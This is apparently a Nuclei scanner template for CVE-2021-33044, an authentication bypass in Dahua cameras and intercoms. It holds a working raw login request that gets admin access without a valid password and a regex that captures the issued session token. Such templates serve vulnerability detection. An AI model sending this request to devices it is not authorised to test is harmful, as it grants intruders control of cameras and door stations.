id: CVE-2021-33044

info:
  name: Dahua IPC/VTH/VTO devices Authentication Bypass
  author: gy741
  severity: critical
  description: An identity authentication bypass vulnerability was found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
  reference:
    - https://github.com/dorkerdevil/CVE-2021-33044
    - https://nvd.nist.gov/vuln/detail/CVE-2021-33044
    - https://seclists.org/fulldisclosure/2021/Oct/13
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2021-33044
    cwe-id: CWE-287
  tags: dahua,cve,cve2021,auth-bypass

requests:
  - raw:
      - |
        POST /RPC2_Login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Connection: close
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: http://{{Hostname}}/
        Referer: http://{{Hostname}}/

        {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "\"result\":true"
          - "id"
          - "params"
          - "session"
        condition: and

    extractors:
      - type: regex
        group: 1
        part: body
        regex:
          - ',"result":true,"session":"([a-z]+)"\}'